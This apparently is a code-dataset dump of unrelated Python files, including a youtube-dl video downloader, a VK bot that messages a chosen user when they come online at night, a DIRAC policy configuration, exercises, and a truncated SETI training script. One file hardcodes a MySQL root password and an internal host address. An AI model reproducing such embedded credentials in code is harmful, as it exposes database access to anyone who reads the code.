Dog(\"Buddy\")\r\n d.add_trick('roll over')\r\n e.add_trick('play dead')\r\n print(d.name, d.kind, d.tricks)\r\n print(e.name, e.kind, e.tricks)\r\n","sub_path":"python/tutorial/ex4_class_variables.py","file_name":"ex4_class_variables.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"574578036","text":"# $HeadURL: $\n\"\"\" Configurations module\n\n Configuration to use policies.\n \n Follows the schema:\n \n : {\n 'description' : ,\n 'module' : ,\n 'command' : ( , < command class name > ),\n 'args' : { arguments for the command } or None \n }\n \n\"\"\"\n\n__RCSID__ = '$Id: $'\n\nPOLICIESMETA = {\n\n\n # DownTime POLICIES...........................................................\n \n 'DTOngoing' :\n {\n 'description' : \"Ongoing and scheduled down-times\",\n 'module' : 'DowntimePolicy',\n 'command' : ( 'DowntimeCommand', 'DowntimeCommand' ),\n 'args' : { 'hours' : 0, 'onlyCache' : True },\n },\n\n 'DTScheduled' :\n {\n 'description' : \"Scheduled down-times, starting in \",\n 'module' : 'DowntimePolicy',\n 'command' : ( 'DowntimeCommand', 'DowntimeCommand' ),\n 'args' : { 'hours' : 12, 'onlyCache' : True },\n },\n\n\n # Space Token POLICIES........................................................\n\n 'SpaceTokenOccupancy' :\n { \n 'description' : \"Space token occupancy\",\n 'module' : 'SpaceTokenOccupancyPolicy',\n 'command' : ( 'SpaceTokenOccupancyCommand', 'SpaceTokenOccupancyCommand' ),\n 'args' : { 'onlyCache' : True },\n }, \n\n\n # Job POLICIES..............................................................\n\n 'JobDoneRatio' :\n {\n 'description' : \"done / ( completed + done ) jobs ( 30 min )\",\n 'module' : 'JobDoneRatioPolicy',\n 'command' : ( 'JobCommand', 'JobCommand' ),\n 'args' : { 'onlyCache' : True, 'timespan' : 1800 }, \n },\n\n 'JobEfficiency' :\n {\n 'description' : \"( completed + done ) / ( completed + done + failed ) jobs ( 30 min )\",\n 'module' : 'JobEfficiencyPolicy',\n 'command' : ( 'JobCommand', 'JobCommand' ),\n 'args' : { 'onlyCache' : True, 'timespan' : 1800 }, \n },\n\n 'JobRunningMatchedRatio' :\n {\n 'description' : \"running / ( running + matched + received + checking ) jobs ( 30 min )\",\n 'module' : 'JobRunningMatchedRatioPolicy',\n 'command' : ( 'JobCommand', 'JobCommand' ),\n 'args' : { 'onlyCache' : True, 'timespan' : 1800 }, \n },\n\n 'JobRunningWaitingRatio' :\n {\n 'description' : \"running / ( running + waiting + staging ) jobs ( 30 min )\",\n 'module' : 'JobRunningWaitingRatioPolicy',\n 'command' : ( 'JobCommand', 'JobCommand' ),\n 'args' : { 'onlyCache' : True, 'timespan' : 1800 }, \n },\n\n\n # Pilot POLICIES..............................................................\n\n 'PilotInstantEfficiency' :\n {\n 'description' : \"Pilots Instant Efficiency ( 30 min )\",\n 'module' : 'PilotEfficiencyPolicy',\n 'command' : ( 'PilotCommand', 'PilotCommand' ),\n 'args' : { 'onlyCache' : True, 'timespan' : 1800 }\n },\n\n\n # ALWAYS SOMETHING POLICIES...................................................\n\n 'AlwaysActive' :\n {\n 'description' : \"A Policy that always returns Active\",\n 'module' : 'AlwaysActivePolicy',\n 'command' : None,\n 'args' : None\n },\n\n 'AlwaysDegraded' :\n {\n 'description' : \"A Policy that always returns Degraded\",\n 'module' : 'AlwaysDegradedPolicy',\n 'command' : None,\n 'args' : None\n },\n \n 'AlwaysProbing' :\n {\n 'description' : \"A Policy that always returns Probing\",\n 'module' : 'AlwaysProbingPolicy',\n 'command' : None,\n 'args' : None\n }, \n\n 'AlwaysBanned' :\n {\n 'description' : \"A Policy that always returns Banned\",\n 'module' : 'AlwaysBannedPolicy',\n 'command' : None,\n 'args' : None\n }\n \n }\n\n\n#...............................................................................\n#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF#EOF","sub_path":"ResourceStatusSystem/Policy/Configurations.py","file_name":"Configurations.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"469506457","text":"data = [57, 48, 46, 52, 45, 59, 61, 60, 49, 71]\r\nn = len(data)\r\nkey = 60\r\nflg = False\r\nfor i in range(n):\r\n if data[i] == key:\r\n print(\"data[{}]が{}です\".format(i, key))\r\n flg = True\r\n break\r\n\r\nif not flg:\r\n print(str(key) + \"は存在しない\")","sub_path":"search_1.py","file_name":"search_1.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"493341635","text":"#! /usr/bin/env python3\nimport glob\nimport hashlib\nimport logging\nimport pathlib\nimport re\nfrom datetime import datetime\nfrom typing import Tuple\n\nfrom dictorm import DictDB, Dict, Or\nfrom youtube_dl import YoutubeDL\n\nfrom lib.db import get_db_context\nfrom lib.plugins.videos.captions import process_captions\nfrom lib.plugins.videos.common import get_downloader_config, get_absolute_channel_directory\n\nlogger = logging.getLogger('lib:downloader')\nch = logging.StreamHandler()\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nch.setFormatter(formatter)\nlogger.addHandler(ch)\n\nydl_logger = logging.getLogger('lib:ydl')\n\n\ndef get_channel_info(channel: Dict) -> dict:\n \"\"\"\n Get the YoutubeDL info_extractor information dictionary. This is built using many http requests.\n\n :param channel: dictorm Channel table\n :return:\n \"\"\"\n ydl = YoutubeDL()\n # ydl.params['logger'] = ydl_logger\n ydl.add_default_info_extractors()\n\n logger.info(f'Downloading video list for {channel[\"url\"]} This may take several minutes.')\n info = ydl.extract_info(channel['url'], download=False, process=False)\n if 'url' in info:\n url = info['url']\n info = ydl.extract_info(url, download=False, process=False)\n\n # Resolve all entries to dictionaries\n info['entries'] = list(info['entries'])\n return info\n\n\ndef update_channels(db_conn, db, oldest_date=None):\n \"\"\"Get all information for each channel. (No downloads performed)\"\"\"\n Channel = db['channel']\n oldest_date = oldest_date or datetime.now().date()\n\n # Update all outdated channel info json columns\n remote_channels = Channel.get_where(\n Channel['url'].IsNotNull(),\n Channel['url'] != '',\n Or(\n Channel['info_date'] < oldest_date,\n Channel['info_date'].IsNull()\n ),\n )\n remote_channels = list(remote_channels)\n logger.debug(f'Getting info for {len(remote_channels)} channels')\n for idx, channel in enumerate(remote_channels):\n progress = int((idx / len(remote_channels)) * 100)\n yield {'progress': progress, 'message': f'Getting video list for {channel[\"name\"]}'}\n info = get_channel_info(channel)\n channel['info_json'] = info\n channel['info_date'] = datetime.now()\n channel.flush()\n db_conn.commit()\n\n yield {'progress': 100, 'message': 'All video lists updated.'}\n\n\nVIDEO_EXTENSIONS = ['mp4', 'webm', 'flv']\n\n\ndef find_matching_video_files(directory, search_str) -> str:\n \"\"\"Create a generator which returns any video files containing the search string.\"\"\"\n for ext in VIDEO_EXTENSIONS:\n yield from glob.glob(f'{directory}/*{search_str}*{ext}')\n\n\ndef find_missing_channel_videos(channel: Dict) -> dict:\n info_json = channel['info_json']\n entries = info_json['entries']\n directory = get_absolute_channel_directory(channel['directory'])\n skip_download_videos = channel['skip_download_videos']\n for entry in entries:\n source_id = entry['id']\n if skip_download_videos and source_id in skip_download_videos:\n # This video previously failed to download, skip it\n continue\n\n matching_video_files = find_matching_video_files(directory, source_id)\n try:\n next(matching_video_files)\n # Some video file was found, move onto the next\n continue\n except StopIteration:\n pass\n\n # No match for this entry, check if the title matches the channel regex\n if channel['match_regex'] and re.match(channel['match_regex'], entry['title']):\n yield entry\n elif channel['match_regex']:\n logger.debug(f'Skipping {entry}, title does not match regex.')\n else:\n # No matches and no regex, download it\n yield entry\n\n\ndef get_channel_video_count(channel: Dict) -> int:\n \"\"\"Count all video files in a channel's directory.\"\"\"\n return len(list(find_matching_video_files(channel['directory'], '')))\n\n\ndef find_all_missing_videos(db: DictDB) -> Tuple[Dict, dict]:\n \"\"\"Search recursively for each video identified in the channel's JSON package. If a video's file can't\n be found, yield it.\n\n If max_downloads_per_channel is provided, this will only yield missing videos when there are less video\n files than this number.\"\"\"\n Channel = db['channel']\n channels = Channel.get_where(Channel['info_json'].IsNotNull())\n for channel in channels:\n video_count = 0\n for missing_video in find_missing_channel_videos(channel):\n yield channel, missing_video\n video_count += 1\n\n\ndef download_video(channel: dict, video: dict) -> pathlib.Path:\n \"\"\"\n Download a video (and associated thumbnail/etc) to it's channel's directory.\n\n :param channel: A DictORM Channel entry\n :param video: A YoutubeDL info entry dictionary\n :return:\n \"\"\"\n # YoutubeDL expects specific options, add onto the default options\n config = get_downloader_config()\n options = dict(config)\n directory = get_absolute_channel_directory(channel['directory'])\n options['outtmpl'] = f'{directory}/{config[\"file_name_format\"]}'\n\n ydl = YoutubeDL(options)\n ydl.add_default_info_extractors()\n source_id = video['id']\n url = f'https://www.youtube.com/watch?v={source_id}'\n entry = ydl.extract_info(url, download=True, process=True)\n final_filename = ydl.prepare_filename(entry)\n final_filename = pathlib.Path(final_filename)\n return final_filename\n\n\ndef replace_extension(path: pathlib.Path, new_ext) -> pathlib.Path:\n \"\"\"Swap the extension of a file's path.\n\n Example:\n >>> foo = pathlib.Path('foo.bar')\n >>> replace_extension(foo, 'baz')\n 'foo.baz'\n \"\"\"\n parent = path.parent\n existing_ext = path.suffix\n path = str(path)\n name, _, _ = path.rpartition(existing_ext)\n path = pathlib.Path(str(parent / name) + new_ext)\n return path\n\n\ndef find_meta_files(path: pathlib.Path, relative_to=None) -> Tuple[\n pathlib.Path, pathlib.Path, pathlib.Path, pathlib.Path]:\n \"\"\"\n Find all files that share a file's full path, except their extensions. It is assumed that file with the\n same name, but different extension is related to that file. A None will be yielded if the meta file doesn't exist.\n\n Example:\n >>> foo = pathlib.Path('foo.bar')\n >>> find_meta_files(foo)\n (pathlib.Path('foo.jpg'), pathlib.Path('foo.description'),\n pathlib.Path('foo.jpg'), pathlib.Path('foo.info.json'))\n \"\"\"\n suffix = path.suffix\n name, suffix, _ = str(path.name).rpartition(suffix)\n meta_file_exts = (('.jpg',), ('.description',), ('.en.vtt', '.en.srt'), ('.info.json',))\n for meta_exts in meta_file_exts:\n for meta_ext in meta_exts:\n meta_path = replace_extension(path, meta_ext)\n if meta_path.exists():\n if relative_to:\n yield meta_path.relative_to(relative_to)\n break\n else:\n yield meta_path\n break\n else:\n yield None\n\n\nNAME_PARSER = re.compile(r'(.*?)_((?:\\d+?)|(?:NA))_(?:(.{11})_)?(.*)\\.'\n r'(jpg|flv|mp4|part|info\\.json|description|webm|..\\.srt|..\\.vtt)')\n\n\ndef insert_video(db: DictDB, video_path: pathlib.Path, channel: Dict, idempotency: str = None,\n skip_captions=False) -> Dict:\n \"\"\"Find and insert a video into the DB. Also, find any meta-files near the video file and store them.\"\"\"\n Video = db['video']\n channel_dir = get_absolute_channel_directory(channel['directory'])\n poster_path, description_path, caption_path, info_json_path = find_meta_files(video_path, relative_to=channel_dir)\n\n # Video paths should be relative to the channel's directory\n if video_path.is_absolute():\n video_path = video_path.relative_to(channel_dir)\n\n name_match = NAME_PARSER.match(video_path.name)\n _ = upload_date = source_id = title = ext = None\n if name_match:\n _, upload_date, source_id, title, ext = name_match.groups()\n\n # Youtube-DL can sometimes set date to `NA`, lets use a None\n if upload_date == 'NA':\n upload_date = None\n\n # Hash the video's path for easy and collision-free linking\n video_path_hash = hashlib.sha3_512(str(video_path).encode('UTF-8')).hexdigest()\n video_path_hash = video_path_hash[:10]\n\n video = Video(\n channel_id=channel['id'],\n description_path=str(description_path) if description_path else None,\n ext=ext,\n poster_path=str(poster_path) if poster_path else None,\n source_id=source_id,\n title=title,\n upload_date=upload_date,\n video_path=str(video_path),\n name=video_path.name,\n caption_path=str(caption_path) if caption_path else None,\n idempotency=idempotency,\n info_json_path=str(info_json_path) if info_json_path else None,\n video_path_hash=video_path_hash,\n )\n video.flush()\n\n if skip_captions is False and caption_path:\n # Process captions only when requested\n process_captions(video)\n\n return video\n\n\ndef _skip_download(error):\n \"\"\"Return True if the error is unrecoverable and the video should be skipped in the future.\"\"\"\n if 'requires payment' in str(error):\n return True\n elif 'Content Warning' in str(error):\n return True\n elif 'Did not get any data blocks' in str(error):\n return True\n return False\n\n\ndef download_all_missing_videos(db_conn, db):\n \"\"\"Find any videos identified by the info packet that haven't yet been downloaded, download them.\"\"\"\n yield {'progress': 0, 'message': 'Comparing local videos to available videos...'}\n missing_videos = list(find_all_missing_videos(db))\n total_missing_videos = len(missing_videos)\n for idx, (channel, missing_video) in enumerate(missing_videos):\n try:\n video_path = download_video(channel, missing_video)\n except Exception as e:\n logger.warning(f'Failed to download \"{missing_video[\"title\"]}\" with exception: {e}')\n if _skip_download(e):\n # The video failed to download, and the error will never be fixed. Skip it forever.\n skip_download_videos = channel['skip_download_videos']\n source_id = missing_video.get('id')\n logger.warn(f'Adding video \"{source_id}\" to skip list for this channel. WROLPi will not '\n f'attempt to download it again.')\n if skip_download_videos and source_id:\n channel['skip_download_videos'].append(missing_video['id'])\n elif source_id:\n channel['skip_download_videos'] = [missing_video['id'], ]\n channel.flush()\n db_conn.commit()\n\n yield f'Failed to download \"{missing_video[\"title\"]}\", see logs...'\n continue\n insert_video(db, video_path, channel, None)\n progress = int((idx / total_missing_videos) * 100)\n yield {'progress': progress, 'message': f'{channel[\"name\"]}: Downloaded: {missing_video[\"title\"]}'}\n db_conn.commit()\n\n yield {'progress': 100, 'message': 'All videos are downloaded'}\n\n\ndef main(args=None):\n \"\"\"Find and download any missing videos. Parse any arguments passed by the cmd-line.\"\"\"\n with get_db_context(commit=True) as (db_conn, db):\n for status in update_channels(db_conn, db):\n logger.info(str(status))\n for status in download_all_missing_videos(db_conn, db):\n logger.info(status)\n return 0\n","sub_path":"lib/plugins/videos/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":11649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"439462695","text":"import vk_api\nimport vk_messages\nfrom time import sleep\nimport datetime as dt\nimport os\n\n\nTOKEN = os.environ.get('VK_TOKEN')\nassert TOKEN, 'environment variable VK_TOKEN is absent or empty'\nPOLL_DELAY = 5\ntarget_ids = [299488530]\nmessages = ['Чево не спиш? 🌚']\ntime_intervals = [(dt.time(0, 30), dt.time(5, 20))]\n\n\ndef sub_times(start_time: dt.time, stop_time: dt.time):\n date = dt.date(1, 1, 1)\n datetime1 = dt.datetime.combine(date, start_time)\n datetime2 = dt.datetime.combine(date, stop_time)\n return datetime1 - datetime2\n\n\ndef time_in_range(time, range1, range2=None):\n if isinstance(range1, tuple) or isinstance(range1, list):\n if len(range1) == 2:\n range2 = range1[1]\n range1 = range1[0]\n assert range2, 'range2 is absent nor range1 is iterable'\n assert sub_times(range2, range1) > dt.timedelta(0), 'range1 is bigger than range2'\n return sub_times(time, range1) > dt.timedelta(0) and sub_times(time, range2) < dt.timedelta(0)\n\n\ndef log(*args, sep=' ', end='\\n'):\n _args = [dt.datetime.now().strftime('[%d.%m %H:%M:%S]')] + list(args)\n print(*_args, sep=sep, end=end)\n\n\ndef main(vk: vk_api.VkApi):\n assert len(target_ids) == len(messages) == len(time_intervals), \\\n 'lengths of target_ids, messages and time_intervals are not same'\n\n if len(target_ids) == 0:\n print('target_ids is empty')\n return\n\n login = os.environ.get('VK_LOGIN')\n password = os.environ.get('VK_PASSWORD')\n assert login, 'environment variable VK_LOGIN is absent or empty'\n assert login, 'environment variable VK_PASSWORD is absent or empty'\n vk_messages.auth(login, password)\n log('Authenticated')\n\n while True:\n user_ids = ','.join(map(str, target_ids))\n users = vk.users.get(user_ids=user_ids, fields='online')\n log('Got user ids')\n\n for user in users:\n if user['online'] == 1:\n user_id = user['id']\n index = target_ids.index(user_id)\n message = messages[index]\n if not time_in_range(dt.datetime.now().time(), time_intervals[index]):\n log(f'User {user_id} is online but current time is not in the given interval')\n continue\n # log(f'User {user_id} is online. Message: {message}. Index: {index}')\n\n vk_messages.send(user_id, message)\n log(f'Sent {message} to user {user_id}')\n\n target_ids.pop(index)\n messages.pop(index)\n time_intervals.pop(index)\n log(f'Popped index {index} from target_ids, messages and time_intervals')\n log('Now target_ids, messages and time_intervals are', target_ids, messages, time_intervals)\n\n if len(target_ids) == 0 or len(messages) == 0:\n log('No messages to send anymore. Returning')\n return\n\n log('Completed loop')\n sleep(POLL_DELAY)\n\n\nif __name__ == '__main__':\n vk_session = vk_api.VkApi(token=TOKEN)\n main(vk_session.get_api())\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"339186306","text":"\"\"\"\n3. Создать текстовый файл (не программно), построчно записать фамилии сотрудников и величину их окладов.\nОпределить, кто из сотрудников имеет оклад менее 20 тыс., вывести фамилии этих сотрудников.\nВыполнить подсчет средней величины дохода сотрудников.\n\"\"\"\n\nfrom functools import reduce\n\n\ndef less_then():\n minimum_salary = 20000\n salary_list = []\n less_then_list = []\n\n with open('../lesson-5/task-3.txt', 'r') as fd:\n for line in fd:\n surname, salary = line.split()\n salary_list.append(int(salary))\n if int(salary) < minimum_salary:\n less_then_list.append(f'зарплата сотрудника {surname} ниже {minimum_salary}')\n\n average_salary = reduce(lambda a, b: a + b, salary_list) / len(salary_list)\n return average_salary, less_then_list\n\n\nif __name__ == '__main__':\n with open('../lesson-5/task-3.txt', 'a+') as f:\n while True:\n data = input('Запишите фамилии сотрудников и величину их окладов. stop - завершить ввод\\n')\n if data == 'stop':\n break\n f.write(data + '\\n')\n\n av_salary, less_then_min = less_then()\n print(f'{less_then_min}')\n print(f'Средняя зарпалата {int(av_salary)}')\n","sub_path":"lesson-5/task-3.py","file_name":"task-3.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"632280016","text":"from pygame import time\n\n\nclass Timer:\n\n def __init__(self, frames, wait=100, frame_index=0, step=1, loop_once=False):\n self.frames = frames\n self.wait = wait\n self.frame_index = frame_index\n self.step = step\n self.loop_once = loop_once\n self.finished = False\n self.last_frame = len(frames) - 1 if step == 1 else 0\n self.last = None\n\n def _get_frame_index(self):\n now = time.get_ticks()\n if self.last is None:\n self.last = now\n self.frame_index = 0 if self.step == 1 else len(self.frames) - 1\n return 0\n elif not self.finished and now - self.last > self.wait:\n self.frame_index += self.step\n if self.loop_once and self.frame_index == self.last_frame:\n self.finished = True\n else:\n self.frame_index %= len(self.frames)\n self.last = now\n return self.frame_index\n\n def reset(self):\n self.last = None\n self.finished = False\n\n def get_image(self):\n return self.frames[self._get_frame_index()]\n","sub_path":"utilities/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"447544077","text":"import json\nimport argparse\n\n\nparser = argparse.ArgumentParser(\"Searches for IP links in result file\")\nparser.add_argument('--file', required=True, help=\"JSON file to read from\")\nparser.add_argument('--source', required=True, help=\"Source address\")\nparser.add_argument('--target', required=True, help=\"Source address\")\nargs = parser.parse_args()\n\nwith open(args.file, 'rb') as f:\n data = json.load(f)\n\npath_list = []\nfor e in data:\n # Use path to build a graph!\n for i in xrange(1, len(e['path'])):\n source = e['path'][i-1]['addr']\n target = e['path'][i]['addr']\n if ((source == args.source and target == args.target) or\n (source == args.target and target == args.source)):\n print(\" -- \".join([p['addr'] for p in e['path']]))\n\n\n\n# Let the search begin\n\n","sub_path":"search-ip-path.py","file_name":"search-ip-path.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"228281429","text":"import cv2 as cv\ncap = cv.VideoCapture(0) # '0' for webcam\nwhile cap.isOpened():\n _, img = cap.read()\n cv.putText(img, 'hello', (30,300), cv.FONT_HERSHEY_SIMPLEX, 2, (255,0,0)) \n cv.imshow('MediaPipe Hands', img)\n if cv.waitKey(5) & 0xFF == 27:\n break\ncap.release()\ncv.destroyAllWindows()","sub_path":"week9/webcam.py","file_name":"webcam.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"370991474","text":"#coding:utf-8\nimport pymysql.cursors\nimport json\nclass OperationMysql:\n\tdef __init__(self):\n\t\tself.conn = pymysql.connect(\n\t\t\thost='10.10.13.71',\n\t\t\tport=3306,\n\t\t\tuser='root',\n\t\t\tpasswd='root-jc-211@#$',\n\t\t\tdb='jc_oa',\n\t\t\tcharset='utf8',\n\t\t\tcursorclass=pymysql.cursors.DictCursor\n\t\t\t)\n\t\tself.cur = self.conn.cursor()\n\n\t#查询一条数据\n\tdef search_one(self,sql):\n\t\tself.cur.execute(sql)\n\t\t# result = self.cur.fetchall()\n\t\tresult = self.cur.fetchone()\n\t\tresult = json.dumps(result, ensure_ascii=False)\n\t\treturn result\n\n\t#查询多条数据\n\tdef search_all(self,sql):\n\t\tself.cur.execute(sql)\n\t\tresult = self.cur.fetchall()\n\t\t# result = self.cur.fetchone()\n\t\tresult = json.dumps(result, ensure_ascii=False)\n\t\treturn result\n\n\nif __name__ == '__main__':\n\top_mysql = OperationMysql()\n\tres = op_mysql.search_all(\"select * from oa_obs where status = 1 and isno_company = 1\")\n\tprint(res)","sub_path":"util/connect_db.py","file_name":"connect_db.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"387938825","text":"from IslandTile import IslandTile\nfrom enemy.enemy import Crab, Crocodile, Deer, Dragon, Gecko, Gladiator, Monkey, Monsters, Rabbit, Samurai, Spider\nfrom item.items import Blue_Fruit, Emerald, Purple_Fruit, Red_Fruit, Rusty_Blade, White_Fruit\n\n# temple\ntemple_items = (Red_Fruit)\ntemple_encounters = (Monkey,)\n\n# spring\nspring_items = (Blue_Fruit)\nspring_encounters = (Crocodile, )\n\n# beach\nbeach_items = (Rusty_Blade)\nbeach_encounters = (Crab, Gecko)\n\n# ravine\nravine_items = (Emerald)\nravine_encounters = (None)\n\n# camp\ncamp_items = (None)\ncamp_encounters = (Deer, Gecko, Rabbit)\n\n# pit\npit_items = (Purple_Fruit)\npit_encounters = (Gladiator, )\n\n# ruins\nruins_items = (White_Fruit)\nruins_encounters = (Samurai,)\n\n# cave\ncave_items = (None)\ncave_encounters = (Spider, )\n\n# mountain\nmountain_items = (None)\nmountain_encounters = (Dragon, )\n\n\n\n\ntemple = IslandTile(\"the Temple\", temple_items , temple_encounters, \"As you push your way through the thick vegetation, you stumble upon an ancient Temple standing stalwart in a small clearing. The area around the temple seems quiet. Too quiet...\")\nspring = IslandTile(\"the Spring\", spring_items, spring_encounters,\"The soft gurgle of water leads you up a small bluff to reveal a small spring, its waters bubbling out of the rocks.\")\nbeach = IslandTile(\"the Beach\", beach_items, beach_encounters, \"You emerge from the jungle onto the beach. 'If I weren't stuck here, this beach would be a beautiful place,' you think to yourself bitterly.\")\nravine = IslandTile(\"the Ravine\", ravine_items, ravine_encounters, \"There is barely any warning as you emerge from the jungle and find yourself facing a massive ravine. You look precariously over the edge, but it is so deep you cannot see the bottom\")\ncamp = IslandTile(\"your campsite\",camp_items, camp_encounters,\"You are back at your meager camp\")\npit = IslandTile(\"the Fighting Pit\", pit_items, pit_encounters, \"An old pit used as a battleground between fighters for entertainment. Some of the fighting blood still remains...\")\nruins = IslandTile(\"the Ancient Ruins\", ruins_items, ruins_encounters, \"The ruins of a civilization remain in a withered form of its old self. Ghosts of the past may still remain...\")\ncave = IslandTile('the Cave', cave_items, cave_encounters, 'A dark hole in the ground with a webs crawling out of the front.')\nmountain = IslandTile('the Towering Mountain', mountain_items, mountain_encounters, 'A towering mountain that looms above the whole mountain. A faint glow can be seen at the top.')","sub_path":"Day1.5/Escape_the_Island_App/islandTiles/tiles.py","file_name":"tiles.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"446110674","text":"from django import forms\nfrom dashboard.models import Review\n\nclass ReviewForm(ModelForm):\n class Meta:\n model = Review\n fields = ('number', 'game', 'release_date', 'price', 'owners', 'developer', 'publisher', 'average_playtime', 'median_playtime', 'metascore')\n labels = {\n 'number': 'Numero',\n 'game': 'Jogo',\n 'release_date': 'Data de lançamento',\n 'price': 'Preço',\n 'owners': 'Jogadores',\n 'developer': 'Desenvolvedor',\n 'publisher': 'Publicador',\n 'average_playtime': 'Tempo medio de jogo',\n 'median_playtime': 'Tempo mediano de jogo',\n 'metascore': 'Metascore',\n }","sub_path":"dashboard/forms/Review.py","file_name":"Review.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"193673763","text":"# -*- coding: UTF-8 -*-\ndef separation(func):\n print('——' * 30)\n print(func.__doc__)\n print('——' * 30)\n func()\n print('——' * 30)\ndef _005():\n \"\"\"005 输入三个整数x,y,z,请把这三个数由小到大输出。\"\"\"\n lis = []\n for i in range(3):\n lis.append(int(input('输入一个整数:')))\n lis.sort()\n print('排序后为:', lis)\ndef _006():\n \"\"\"006 斐波那契数列。输出0、1、1、2、3、5、8、13、21、34、……。\"\"\"\n def fib(n):\n if n == 0:\n return 0\n elif n == 1:\n return 1\n else:\n return fib(n-1) + fib(n-2)\n x = int(input('输入需要的个数:'))\n for i in range(x):\n print(fib(i), end=' ')\n print()\ndef _007():\n \"\"\"007 将一个列表的数据复制到另一个列表中。\"\"\"\n x = input('输入一个列表:')\n lis = x.split(',')\n for i, s in enumerate(lis):\n lis[i] = int(s)\n print('输入的列表为:', lis)\n lis2 = lis[:]\n print('新的列表为:', lis2)\ndef _008():\n \"\"\"008 输出 9*9 乘法口诀表。\"\"\"\n for i in range(1, 10):\n for j in range(1, 10):\n if i >= j:\n print('{}×{}={:<2d}'.format(j, i, i*j), end=' ')\n print()\n\n\nseparation(_008)\n","sub_path":"Python Exercise.py","file_name":"Python Exercise.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"548330383","text":"import atexit\nimport getpass\nimport os\nimport warnings\nfrom pathlib import Path\n\nimport mlcrate as mlc\nimport neptune.new as neptune\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nimport torchvision\nimport ttach as tta\nfrom adabelief_pytorch import AdaBelief\nfrom augmentations.augmentation import seti_transform0\nfrom augmentations.strong_aug import *\nfrom cuml.metrics import log_loss # , roc_auc_score\nfrom dataset import SetiDataset\nfrom fastprogress.fastprogress import force_console_behavior\nfrom iterstrat.ml_stratifiers import MultilabelStratifiedKFold\nfrom losses import FocalLoss, RocAucLoss, ROCStarLoss\nfrom madgrad import MADGRAD\nfrom models.resnetrs import ResNet_18RS, resnetrs_init_weights\nfrom omegaconf import OmegaConf\nfrom optimizer.sam import SAM\nfrom pandarallel import pandarallel\nfrom sampling import get_sampling\nfrom sklearn.metrics import roc_auc_score\nfrom timm.models import *\nfrom timm.models.nfnet import *\nfrom torch.cuda.amp import GradScaler, autocast\nfrom torch.optim import SGD, Adam\nfrom torch.optim.lr_scheduler import (\n CosineAnnealingLR,\n CosineAnnealingWarmRestarts,\n ReduceLROnPlateau,\n)\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\nfrom utils import (\n Mish,\n TanhExp,\n find_exp_num,\n get_logger,\n parse_args,\n remove_abnormal_exp,\n replace_activations,\n save_model,\n seed_everything,\n)\nfrom validation import get_validation\n\npandarallel.initialize(progress_bar=True)\nwarnings.filterwarnings(\"ignore\")\ntqdm.pandas()\nmaster_bar, progress_bar = force_console_behavior()\n\n\ndef main():\n run = neptune.init(\n project=\"karunru/seti\",\n api_token=os.environ[\"NEPTUNE_SETI_API_TOKEN\"],\n )\n\n args = parse_args()\n config = OmegaConf.load(args.config)\n config.merge_with_dotlist(args.options)\n atexit.register(\n remove_abnormal_exp, log_path=config.log_path, config_path=config.config_path\n )\n seed_everything(config.seed)\n\n exp_num = find_exp_num(log_path=config.log_path)\n exp_num = str(exp_num).zfill(3)\n run[\"exp_num\"] = exp_num\n\n config.weight_path = str(Path(config.weight_path) / f\"exp_{exp_num}\")\n os.makedirs(config.weight_path, exist_ok=True)\n config.pred_path = str(Path(config.pred_path) / f\"exp_{exp_num}\")\n os.makedirs(config.pred_path, exist_ok=True)\n OmegaConf.save(config, Path(config.config_path) / f\"exp_{exp_num}.yaml\")\n run[\"params\"] = config\n logger, csv_logger = get_logger(config, exp_num)\n timer = mlc.time.Timer()\n logger.info(mlc.time.now())\n logger.info(f\"config: {config}\")\n\n train_df = pd.read_csv(Path(config.root) / \"train_labels.csv\")\n train_df[\"file_name\"] = train_df[\"id\"].parallel_apply(\n lambda id: Path(config.root) / f\"train/{id[0]}/{id}.npy\"\n )\n X = train_df[\"file_name\"].values\n y = train_df[\"target\"].values\n\n transform = eval(config.transform.name)(config.transform.size)\n logger.info(f\"augmentation: {transform}\")\n strong_transform = eval(config.strong_transform.name)\n logger.info(f\"strong augmentation: {config.strong_transform.name}\")\n\n splits = get_validation(train_df, config)\n\n scores = np.zeros(len(splits))\n for fold, (train_idx, val_idx) in enumerate(splits):\n\n X_train, X_val = X[train_idx], X[val_idx]\n y_train, y_val = y[train_idx], y[val_idx]\n X_train, y_train = get_sampling(X_train.reshape(-1, 1), y_train, config)\n X_train = X_train.reshape(-1)\n train_data = SetiDataset(\"train\", X_train, y_train, transform[\"albu_train\"])\n 